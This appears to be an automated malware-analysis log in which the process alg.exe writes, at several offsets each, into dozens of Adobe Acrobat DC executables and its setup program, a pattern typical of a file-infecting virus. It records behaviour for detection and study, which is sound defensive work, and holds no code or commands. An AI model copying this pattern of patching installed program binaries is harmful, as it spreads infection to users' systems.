Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203904
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 3201596
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 27136
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600652
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600576
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 8988
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 31744
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605260
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605184
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 12684
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 332800
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906316
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906240
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 232412
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 3571200
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144716
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144640
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 1485948
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59362816
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936332
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936256
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 140924
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 3571200
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144716
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 4144640
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 1485948
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59362816
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936332
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936256
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 140924
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 50176
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623692
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623616
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 24668
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 328192
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901708
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901632
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 4988
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 642048
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215564
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215488
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 132252
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 11459072
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032588
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032512
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 4630732
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 192512
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 766028
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 765952
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 95345
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 759296
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332812
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332736
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 285633
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 385536
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 959052
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 958976
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 182364
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 123904
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697420
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697344
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 66716
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1102848
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676364
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676288
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 753617
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 2531840
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105356
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105280
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 1150992
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 459776
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033292
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033216
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 209348
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 99840
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673356
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673280
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 69527
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 256512
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 830028
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 829952
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 72028
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 521216
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094732
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094656
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 321696
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 210944
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784460
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784384
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 126840
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 13312
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586828
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586752
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 2828
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 4785664
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359180
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359104
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 2430581
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 632832
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206348
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206272
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 206444
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0
